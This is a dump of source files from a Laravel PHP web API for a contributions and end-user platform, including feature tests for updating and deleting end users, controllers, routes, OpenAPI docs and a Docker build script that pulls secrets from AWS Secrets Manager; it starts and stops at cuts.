$endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_update(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === \"Updated end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Destroy.\n */\n\n /** @test */\n public function guest_cannot_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_for_someone_else_cannot_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_for_them_self_can_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function database_records_and_relationships_deleted_for_force_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n $contribution = factory(Contribution::class)->create(['end_user_id' => $endUser->id]);\n $audit = factory(Audit::class)->create(['user_id' => $endUser->user->id]);\n $notification = factory(Notification::class)->create(['user_id' => $endUser->user->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $this->assertDatabaseMissing('end_users', ['id' => $endUser->id]);\n $this->assertDatabaseMissing('users', ['id' => $endUser->user->id]);\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('audits', ['id' => $audit->id]);\n $this->assertDatabaseMissing('notifications', ['id' => $notification->id]);\n }\n\n /** @test */\n public function database_records_and_relationships_not_deleted_for_soft_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n $contribution = factory(Contribution::class)->create(['end_user_id' => $endUser->id]);\n $audit = factory(Audit::class)->create(['user_id' => $endUser->user->id]);\n $notification = factory(Notification::class)->create(['user_id' => $endUser->user->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'soft_delete']);\n\n $this->assertDatabaseHas('end_users', ['id' => $endUser->id]);\n $this->assertSoftDeleted('users', ['id' => $endUser->user->id]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseHas('audits', ['id' => $audit->id]);\n $this->assertDatabaseHas('notifications', ['id' => $notification->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_force_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Force deleted end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_soft_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'soft_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Soft deleted end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6133056282997131,
"alphanum_fraction": 0.6174635887145996,
"avg_line_length": 19.913043975830078,
"blob_id": "04fe5426d524910aa12c07906ef844e64012d86d",
"content_id": "973fd93a00e0eb1b1765572c1f1b72d4ba87be7d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 481,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 23,
"path": "/app/Support/Pagination.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse Illuminate\\Support\\Facades\\Config;\n\nclass Pagination\n{\n /**\n * @param int|null $perPage\n * @return int\n */\n public function perPage(int $perPage = null): int\n {\n $perPage = $perPage ?? Config::get('connecting_voices.pagination.default');\n $perPage = max($perPage, 1);\n $perPage = min($perPage, Config::get('connecting_voices.pagination.max'));\n\n return $perPage;\n }\n}\n"
},
{
"alpha_fraction": 0.5982708930969238,
"alphanum_fraction": 0.5988472700119019,
"avg_line_length": 32.36538314819336,
"blob_id": "c5384289e04ef4372de143279ebf0a691fd786bc",
"content_id": "371cc169cd7fc65ee2ddac28fb298a75b2a91cde",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1735,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 52,
"path": "/app/Docs/Operations/Tags/IndexTagOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Tags;\n\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Tag\\TagSchema;\nuse App\\Docs\\Tags\\TagsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexTagOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all tags')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n 'This endpoint does not return a paginated set, but instead all tags at once.'\n )\n )\n ->tags(TagsTag::create())\n ->noSecurity()\n ->parameters(\n SortParameter::create(null, ['name'], 'name')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n Schema::object()->properties(\n Schema::array('data')->items(TagSchema::create())\n )\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6684027910232544,
"avg_line_length": 19.571428298950195,
"blob_id": "f526df78724a0277bed0a8877fdaeaef43067566",
"content_id": "aa2fc1ce35b2cecae1092482ea8d6cb1b9c3a36d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Relationships/AuditRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Laravel\\Passport\\Client;\n\ntrait AuditRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function client(): BelongsTo\n {\n return $this->belongsTo(Client::class, 'client_id');\n }\n}\n"
},
{
"alpha_fraction": 0.6223776340484619,
"alphanum_fraction": 0.6270396113395691,
"avg_line_length": 24.235294342041016,
"blob_id": "40f50af4ca43a7c7aee0926bd24c39359c4733f4",
"content_id": "c2584c6d836dd41d134a4799a9fbd7b8a0ebfa53",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 429,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 17,
"path": "/database/factories/AuditFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Audit;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Audit::class, function (Faker $faker): array {\n return [\n 'action' => Audit::ACTION_READ,\n 'description' => $faker->paragraph,\n 'ip_address' => $faker->ipv4,\n 'created_at' => Date::now(),\n ];\n});\n"
},
{
"alpha_fraction": 0.6463909149169922,
"alphanum_fraction": 0.6472019553184509,
"avg_line_length": 26.399999618530273,
"blob_id": "c61eefe5921afcd4e5444c02de5d44a97370202f",
"content_id": "8d18532a5a6b43954283e3a6e12c6bbed2fb7807",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1233,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 45,
"path": "/app/Listeners/EndUserEventSubscriber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse App\\Events\\EndUser\\EndUserCreated;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Setting;\nuse App\\VariableSubstitution\\Email\\Admin\\NewEndUserSubstituter;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass EndUserEventSubscriber extends EventSubscriber\n{\n /**\n * @return string[]\n */\n protected function mapping(): array\n {\n return [\n EndUserCreated::class => 'handleEndUserCreated',\n ];\n }\n\n /**\n * @param \\App\\Events\\EndUser\\EndUserCreated $event\n */\n public function handleEndUserCreated(EndUserCreated $event): void\n {\n // Email verification to end users.\n $event->getEndUser()->user->sendEmailVerificationNotification();\n\n // Email to admins.\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n Config::get('connecting_voices.admin_email'),\n Arr::get($emailContent, 'admin.new_end_user.subject'),\n Arr::get($emailContent, 'admin.new_end_user.body'),\n new NewEndUserSubstituter($event->getEndUser())\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.6844174265861511,
"alphanum_fraction": 0.6872766017913818,
"avg_line_length": 37.86111068725586,
"blob_id": "ec31a02212547e602ad7f708001c3391011856d1",
"content_id": "f1a1cf60210a5b069cb4954917bc4cf8fed001f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2798,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 72,
"path": "/docker/build.sh",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Requires the following environment variables:\n# $TRAVIS_BUILD_DIR = The directory of the project.\n# $TRAVIS_COMMIT = The commit hash of the build.\n# $REPO_URI = The URI of the Docker repo to tag the image with.\n# $ENV_SECRET_ID = The ID of the .env file in AWS Secrets Manager (defaults to \".env\").\n# $PUBLIC_KEY_SECRET_ID = The ID of the OAuth public key file in AWS Secrets Manager (default to \"oauth-public.key\").\n# $PRIVATE_KEY_SECRET_ID = The ID of the OAuth private key file in AWS Secrets Manager (default to \"oauth-private.key\").\n\n# Bail out on first error.\nset -e\n\n# Package the app.\necho \"Packaging the app...\"\ncd ${TRAVIS_BUILD_DIR}\n# We can use `archive` which makes use of .gitattributes to `export-ignore` extraneous files.\ngit archive --format=tar --worktree-attributes ${TRAVIS_COMMIT} | tar -xf - -C ${TRAVIS_BUILD_DIR}/docker/app/packaged\n\n# Production Build Steps.\necho \"Installing composer dependencies...\"\ncd ${TRAVIS_BUILD_DIR}/docker/app/packaged\n./develop composer install --no-dev --optimize-autoloader\n\necho \"Installing NPM dependencies...\"\n./develop npm ci\n\necho \"Compiling assets...\"\n./develop npm run prod\ndocker run --rm \\\n -w /opt \\\n -v ${TRAVIS_BUILD_DIR}/docker/app/packaged:/opt \\\n ubuntu:16.04 bash -c \"rm -rf node_modules\"\n\n# Get the .env file.\necho \"Downloading .env file...\"\naws secretsmanager get-secret-value \\\n --secret-id ${ENV_SECRET_ID} | \\\n python -c \"import json,sys;obj=json.load(sys.stdin);print obj['SecretString'];\" > .env\n\n# Get the OAuth keys.\necho \"Downloading public OAuth key...\"\naws secretsmanager get-secret-value \\\n --secret-id ${PUBLIC_KEY_SECRET_ID} | \\\n python -c \"import json,sys;obj=json.load(sys.stdin);print obj['SecretString'];\" > storage/oauth-public.key\n\necho \"Downloading private OAuth key...\"\naws secretsmanager get-secret-value \\\n --secret-id ${PRIVATE_KEY_SECRET_ID} | \\\n python -c \"import json,sys;obj=json.load(sys.stdin);print obj['SecretString'];\" > storage/oauth-private.key\n\n# Build the Docker image with latest code.\necho \"Building Docker images...\"\ncd ${TRAVIS_BUILD_DIR}/docker/app\ndocker build \\\n -t ${REPO_URI}:latest \\\n -t ${REPO_URI}:${TRAVIS_COMMIT} .\n\n# Clean up packaged directory, but only if not in CI environment.\necho \"Cleaning up...\"\ncd ${TRAVIS_BUILD_DIR}/docker/app/packaged\nPWD=$(pwd)\nif [[ \"$PWD\" == \"$TRAVIS_BUILD_DIR/docker/app/packaged\" ]]; then\n # The \"vendor\" directory (any any built assets!) will be owned\n # as user \"root\" on the Linux file system\n # So we'll use Docker to delete them with a one-off container\n docker run --rm \\\n -w /opt \\\n -v ${TRAVIS_BUILD_DIR}/docker/app/packaged:/opt \\\n ubuntu:16.04 bash -c \"rm -rf ./* && rm -rf ./.git* && rm .env*\"\n echo -e \"*\\n!.gitignore\\n\" > .gitignore\nfi\n"
},
{
"alpha_fraction": 0.5587703585624695,
"alphanum_fraction": 0.5591319799423218,
"avg_line_length": 39.07246398925781,
"blob_id": "4203ed144c9d4acf46a825aa0639779d8e0d57e9",
"content_id": "0750d337115d7ac51e458c251c4e5e15825ce93b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2765,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 69,
"path": "/app/Http/Requests/Setting/UpdateSettingRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Setting;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\n\nclass UpdateSettingRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n /*\n * Frontend content.\n */\n 'frontend_content' => ['bail', 'array'],\n\n 'frontend_content.home_page' => ['bail', 'array'],\n 'frontend_content.home_page.title' => ['bail', 'string'],\n\n /*\n * Email content.\n */\n 'email_content' => ['bail', 'array'],\n\n 'email_content.admin' => ['bail', 'array'],\n\n 'email_content.admin.new_contribution' => ['bail', 'array'],\n 'email_content.admin.new_contribution.subject' => ['bail', 'string'],\n 'email_content.admin.new_contribution.body' => ['bail', 'string'],\n\n 'email_content.admin.updated_contribution' => ['bail', 'array'],\n 'email_content.admin.updated_contribution.subject' => ['bail', 'string'],\n 'email_content.admin.updated_contribution.body' => ['bail', 'string'],\n\n 'email_content.admin.new_end_user' => ['bail', 'array'],\n 'email_content.admin.new_end_user.subject' => ['bail', 'string'],\n 'email_content.admin.new_end_user.body' => ['bail', 'string'],\n\n 'email_content.admin.password_reset' => ['bail', 'array'],\n 'email_content.admin.password_reset.subject' => ['bail', 'string'],\n 'email_content.admin.password_reset.body' => ['bail', 'string'],\n\n 'email_content.end_user' => ['bail', 'array'],\n\n 'email_content.end_user.email_confirmation' => ['bail', 'array'],\n 'email_content.end_user.email_confirmation.subject' => ['bail', 'string'],\n 'email_content.end_user.email_confirmation.body' => ['bail', 'string'],\n\n 'email_content.end_user.password_reset' => ['bail', 'array'],\n 'email_content.end_user.password_reset.subject' => ['bail', 'string'],\n 'email_content.end_user.password_reset.body' => ['bail', 'string'],\n\n 'email_content.end_user.contribution_approved' => ['bail', 'array'],\n 'email_content.end_user.contribution_approved.subject' => ['bail', 'string'],\n 'email_content.end_user.contribution_approved.body' => ['bail', 'string'],\n\n 'email_content.end_user.contribution_rejected' => ['bail', 'array'],\n 'email_content.end_user.contribution_rejected.subject' => ['bail', 'string'],\n 'email_content.end_user.contribution_rejected.body' => ['bail', 'string'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5351452827453613,
"alphanum_fraction": 0.5360824465751648,
"avg_line_length": 36.438594818115234,
"blob_id": "0be881493b63e75530c1735a67e55753b403cb79",
"content_id": "b156c3c391884517d72cdc01120950b6598f7836",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2134,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 57,
"path": "/routes/api.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Support\\Facades\\Route;\n\n/*\n|--------------------------------------------------------------------------\n| API Routes\n|--------------------------------------------------------------------------\n|\n| Here is where you can register API routes for your application. These\n| routes are loaded by the RouteServiceProvider within a group which\n| is assigned the \"api\" middleware group. Enjoy building your API!\n|\n*/\n\nRoute::prefix('v1')\n ->group(\n function (): void {\n Route::get('admins/me', 'Admin\\\\MeController')\n ->name('admins.me');\n Route::apiResource('admins', 'AdminController');\n\n Route::apiResource('audits', 'AuditController')\n ->only('index', 'show');\n\n Route::apiResource('contributions', 'ContributionController');\n Route::put('contributions/{contribution}/approve', 'Contribution\\\\ApproveController')\n ->name('contributions.approve');\n Route::put('contributions/{contribution}/reject', 'Contribution\\\\RejectController')\n ->name('contributions.reject');\n\n Route::get('end-users/me', 'EndUser\\\\MeController')\n ->name('end-users.me');\n Route::apiResource('end-users', 'EndUserController');\n\n Route::post('exports/{type}/request', 'Export\\\\RequestController')\n ->name('exports.request');\n\n Route::get('files/{file}/download', 'File\\\\DownloadController')\n ->name('files.download');\n Route::post('files/{file}/request', 'File\\\\RequestController')\n ->name('files.request');\n\n Route::apiResource('notifications', 'NotificationController')\n ->only('index', 'show');\n\n Route::get('settings', 'SettingController@index')\n ->name('settings.index');\n Route::put('settings', 'SettingController@update')\n ->name('settings.update');\n\n Route::apiResource('tags', 'TagController')\n ->only('index', 'store', 'show', 'destroy');\n }\n );\n"
},
{
"alpha_fraction": 0.6555555462837219,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8,
"blob_id": "647eb45a5c1c9157cbd8a3b305c76eeba6e1c15f",
"content_id": "0e5fb0b6c1ec016a24d546d0c9ff0cac236df2b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/TagScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait TagScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6026041507720947,
"alphanum_fraction": 0.6031249761581421,
"avg_line_length": 36.64706039428711,
"blob_id": "b2b11c94a0da65ea8236ac7dd9853d0c7ad2fb18",
"content_id": "01685476894140ebca544a3ba21ac0eeaf159220",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1920,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 51,
"path": "/app/Docs/Operations/Files/DownloadFileOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Files;\n\nuse App\\Docs\\Tags\\FilesTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass DownloadFileOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Download a specific file')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n <<<'EOT'\n * Public files are accessible from the public.\n * Private files require the `token` parameter which must be requested.\n EOT\n )\n )\n ->tags(FilesTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::pdf()->schema(Schema::string()->format(Schema::FORMAT_BINARY)),\n MediaType::jpeg()->schema(Schema::string()->format(Schema::FORMAT_BINARY)),\n MediaType::png()->schema(Schema::string()->format(Schema::FORMAT_BINARY)),\n MediaType::create()->mediaType('application/zip')->schema(\n Schema::string()->format(Schema::FORMAT_BINARY)\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6795302033424377,
"alphanum_fraction": 0.681208074092865,
"avg_line_length": 25.488889694213867,
"blob_id": "da3babdde381b88789bb4e656b3669a7228a86e7",
"content_id": "4d5d10d370d60abd7a106710ce1dc94a8681998d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1192,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 45,
"path": "/app/Http/Controllers/V1/EndUser/MeController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\EndUser;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\EndUserResource;\nuse App\\Models\\EndUser;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\nclass MeController extends ApiController\n{\n /**\n * MeController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware('auth:api');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(Request $request): JsonResource\n {\n $this->authorize('me', EndUser::class);\n\n $endUser = $request->user('api')->endUser;\n\n event(EndpointInvoked::onRead($request, \"Viewed end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n}\n"
},
{
"alpha_fraction": 0.6908023357391357,
"alphanum_fraction": 0.6927592754364014,
"avg_line_length": 21.217391967773438,
"blob_id": "38729472a775d0e3d6746ff13232f36ecefa3151",
"content_id": "44e19a1eb6a8f3421da686e910621d33f248db7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 23,
"path": "/app/Exceptions/InvalidExporterException.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exceptions;\n\nuse App\\Exporters\\BaseExporter;\nuse RuntimeException;\n\nclass InvalidExporterException extends RuntimeException\n{\n /**\n * ExporterNotFoundException constructor.\n *\n * @param string $exporterClass\n */\n public function __construct(string $exporterClass)\n {\n $baseExporterClass = BaseExporter::class;\n\n parent::__construct(\"Exporter class [{$exporterClass}] must be an instance of [{$baseExporterClass}].\");\n }\n}\n"
},
{
"alpha_fraction": 0.668443500995636,
"alphanum_fraction": 0.6695095896720886,
"avg_line_length": 27.86153793334961,
"blob_id": "35a26940b54e5f21026d1a95d46a640dd69674b4",
"content_id": "8c10df3fbd2ff542f51b1a251b2ec117138f2485",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1876,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 65,
"path": "/app/Http/Controllers/V1/Export/RequestController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Export;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Export\\RequestExportRequest;\nuse App\\Http\\Resources\\ExportResource;\nuse App\\Models\\Export;\nuse App\\Services\\ExportService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\JsonResponse;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass RequestController extends ApiController\n{\n /**\n * @var \\App\\Services\\ExportService\n */\n protected $exportService;\n\n /**\n * RequestController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\ExportService $exportService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n ExportService $exportService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n\n $this->exportService = $exportService;\n }\n\n /**\n * @param \\App\\Http\\Requests\\Export\\RequestExportRequest $request\n * @param string $type\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function __invoke(RequestExportRequest $request, string $type): JsonResponse\n {\n $this->authorize('request', [Export::class, $type]);\n\n $export = DB::transaction(function () use ($request, $type): Export {\n return $this->exportService->create($type, $request->user('api')->admin);\n });\n\n event(EndpointInvoked::onCreate($request, \"Requested export [{$type}].\"));\n\n return (new ExportResource($export))\n ->toResponse($request)\n ->setStatusCode(Response::HTTP_CREATED);\n }\n}\n"
},
{
"alpha_fraction": 0.7129629850387573,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 9.800000190734863,
"blob_id": "6bf7058e3f5c633a35be9d12d3079263ae1c40e9",
"content_id": "efc41bd9d9ad9905c53012bc6e4baf2aca20a581",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 10,
"path": "/app/Models/Relationships/SettingRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\ntrait SettingRelationships\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6902984976768494,
"alphanum_fraction": 0.6915422677993774,
"avg_line_length": 27.714284896850586,
"blob_id": "da25349cbb2112edb7b8c87726979c2b5f64a5cb",
"content_id": "654616e845607854943e0aaf24eed4b40b569438",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 804,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/Tags/TagsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
